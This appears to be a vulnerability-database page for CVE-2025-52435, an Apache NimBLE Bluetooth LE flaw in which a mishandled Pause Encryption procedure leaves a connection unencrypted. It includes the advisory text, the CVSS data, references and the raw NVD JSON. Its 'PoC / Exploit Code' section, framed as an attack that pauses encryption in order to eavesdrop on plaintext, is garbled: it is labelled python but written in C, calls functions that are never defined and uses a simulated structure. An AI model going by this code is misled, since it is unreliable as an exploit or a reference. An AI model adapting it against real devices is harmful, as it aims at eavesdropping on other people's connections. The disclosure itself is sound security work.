CVE-2025-52435

Description

J2EE Misconfiguration: Data Transmission Without Encryption vulnerability in Apache NimBLE. Improper handling of Pause Encryption procedure on Link Layer results in a previously encrypted connection being left in un-encrypted state allowing an eavesdropper to observe the remainder of the exchange. This issue affects Apache NimBLE: through <= 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:* - VULNERABLE

Apache NimBLE <= 1.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/* CVE-2025-52435 PoC - NimBLE Link Layer Encryption Pause Exploit
 * This PoC demonstrates the encryption pause vulnerability in Apache NimBLE
 * Note: Requires Bluetooth Low Energy monitoring capabilities
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simulated BLE LL Control PDU structure
typedef struct {
    uint8_t opcode;
    uint8_t conn_handle[2];
    uint8_t* data;
} ll_control_pdu_t;

// Pause Encryption Opcode (0x05) - LL_PAUSE_ENC_REQ/RSP
#define LL_PAUSE_ENC_REQ 0x05
#define LL_PAUSE_ENC_RSP 0x06

// Malicious Pause Encryption PDU generator
ll_control_pdu_t* craft_pause_enc_pdu(uint16_t conn_handle) {
    ll_control_pdu_t* pdu = malloc(sizeof(ll_control_pdu_t));
    pdu->opcode = LL_PAUSE_ENC_REQ;
    pdu->conn_handle[0] = conn_handle & 0xFF;
    pdu->conn_handle[1] = (conn_handle >> 8) & 0xFF;
    pdu->data = NULL;
    return pdu;
}

// Exploit function - sends malicious pause encryption request
int exploit_pause_encryption(int fd, uint16_t conn_handle) {
    printf("[*] CVE-2025-52435: Initiating encryption pause attack\n");
    printf("[*] Target connection handle: 0x%04x\n", conn_handle);
    
    // Step 1: Inject Pause Encryption Request
    ll_control_pdu_t* mal_pdu = craft_pause_enc_pdu(conn_handle);
    send_ll_control_pdu(fd, mal_pdu);
    
    // Step 2: Wait for response and capture now-unencrypted traffic
    sleep(1);
    printf("[*] Connection encryption disabled - monitoring plaintext data\n");
    
    // Step 3: Capture sensitive data from unencrypted connection
    capture_plaintext_traffic(fd);
    
    free(mal_pdu);
    return 0;
}

int main(int argc, char** argv) {
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <connection_handle>\n", argv[0]);
        return 1;
    }
    uint16_t handle = atoi(argv[1]);
    return exploit_pause_encryption(0, handle);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-52435
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-52435
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-52435/
[4] VulDB https://vuldb.com/cve/CVE-2025-52435
[5] https://github.com/apache/mynewt-nimble/commit/164f1c23c18a290908df76ed83fe848bfe4a4903
[6] https://github.com/apache/mynewt-nimble/commit/ec3d75e909fa6dcadf1836fefc4432794a673d18
[7] https://lists.apache.org/thread/ow8dzpsqfh9llfclh5fzh6z237brzc0s
[8] http://www.openwall.com/lists/oss-security/2026/01/08/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-52435", "sourceIdentifier": "[email protected]", "published": "2026-01-10T10:15:50.320", "lastModified": "2026-01-14T16:30:55.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "J2EE Misconfiguration: Data Transmission Without Encryption vulnerability in Apache NimBLE.\n\nImproper handling of Pause Encryption procedure on Link Layer results in a previously encrypted connection being left in un-encrypted state allowing an eavesdropper to observe the remainder of the exchange.\nThis issue affects Apache NimBLE: through <= 1.8.0.\n\nUsers are recommended to upgrade to version 1.9.0, which fixes the issue."}, {"lang": "es", "value": "Mala configuración de J2EE: vulnerabilidad de transmisión de datos sin cifrado en Apache NimBLE.\n\nEl manejo inadecuado del procedimiento de Pausa de Cifrado en la Capa de Enlace provoca que una conexión previamente cifrada quede en estado sin cifrar, permitiendo a un fisgón observar el resto del intercambio.\nEste problema afecta a Apache NimBLE: hasta la versión 1.8.0 inclusive.\n\nSe recomienda a los usuarios actualizar a la versión 1.9.0, que corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-5"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.0", "matchCriteriaId": "DC033019-AA62-465E-AD0A-8018D8C89ED3"}]}]}], "references": [{"url": "https://github.com/apache/mynewt-nimble/commit/164f1c23c18a290908df76ed83fe848bfe4a4903", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/apache/mynewt-nimble/commit/ec3d75e909fa6dcadf1836fefc4432794a673d18", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://lists.apache.org/thread/ow8dzpsqfh9llfclh5fzh6z237brzc0s", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/08/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}